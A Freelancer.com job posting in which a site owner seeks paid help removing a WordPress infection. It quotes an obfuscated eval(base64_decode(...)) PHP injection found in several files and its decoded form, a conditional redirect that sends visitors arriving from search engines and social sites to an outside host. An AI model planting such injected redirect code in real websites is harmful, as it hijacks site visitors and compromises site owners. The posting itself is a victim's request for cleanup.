wordpress virus removal
$30-250 CAD
În desfășurare
Data postării: peste 11 ani în urmă
$30-250 CAD
Plata la predare
When I blog on my site [login to view URL] (or autopost via "Social Networks Auto Poster" widget) - it posts to my facebook. The shortened code (ex [login to view URL] ) leads to a malicious site I believe, ex [login to view URL] (oddly, on mobile devices, it correctly goes to my blog).
I am not sure if this is the cause, however a previous person I hired noticed some code that shouldn't be there (in his words). Code is below.
I would like to have the problem resolved, and also know how to prevent future such events from taking place? Below is what I've been told was found:
"I believe your website might have been hacked. There is this type of code (see below) in several of the php files, which is not normally in the wordpress php files… it’s been my experience that when there is something like this .. the website has been hacked. The best I could do is remove all this code, but without fixing the security hole(s) the hackers will likely just put this code back in there. I am just letting you know, so that you can address the issue before it gets worse.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9xcnVlLnFwb2UuY29tLyIpOwpleGl0KCk7DQp9Cn0NCn0NCn0NCn0="));
com]
I base64_decoded that code it comes out to this (see below) but it basically looks like it might redirecting people to [login to view URL] (I didn’t go to this website because it is likely malicious) when they are referred to your website by search engines / facebook / myspace / etc.
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"[login to view URL]")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]") or stristr($referer,"[login to view URL]")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: [login to view URL]");
exit();
}
}
}
}
ID-ul proiectului: 4004917
Despre proiect
9 propuneri
Proiect la distanță
Activ: 11 ani în urmă
Vrei să câștigi bani?
Avantajele de a licita pe platforma Freelancer
Stabilește bugetul și intervalul temporal
Îți primești plata pentru serviciile prestate
Evidențiază-ți propunerea
Te înregistrezi și licitezi gratuit pentru proiecte
4,6
4,6
9 freelanceri plasează o ofertă medie de $126 CAD pentru proiect
5,2
5,2
4,9
4,9
4,9
4,9
4,6
4,6
4,0
4,0
3,9
3,9
3,1
3,1
2,0
2,0
0,0
0,0
Despre client
Kanata, Canada
5
Metoda de plată a fost confirmată
Membru din nov. 11, 2012
Verificarea clientului
Alte proiecte ale acestui client
$30-250 USD
$30-250 CAD
$30-250 USD
$30-40 CAD
$10-30 CAD
Proiecte similare
$250-750 USD
€30-250 EUR
$15-25 AUD / hour
$10-30 CAD
$30-250 USD
₹600-1500 INR
$10-30 USD
₹600-1500 INR
$30-250 USD
$10-30 USD
€2-6 EUR / hour
₹600-1500 INR
$50-200 USD
₹3500-4500 INR
$30-250 AUD
₹12500-37500 INR
₹600-1500 INR
₹600-1500 INR
$30-250 USD
$10-30 USD
Mulțumim! Ți-am trimis prin e-mail linkul pe care trebuie să-l accesezi pentru a revendica creditul gratuit.
A apărut o eroare la trimiterea e-mailului. Încearcă din nou.
Nu s-a putut efectua copierea în clipboard. Încearcă din nou după ce-ți ajustezi permisiunile.
S-a copiat în clipboard.
Se încarcă previzualizarea
S-a oferit permisiunea de depistare a locației.
Ți-a expirat sesiunea pentru conectare sau te-ai deconectat. Conectează-te din nou.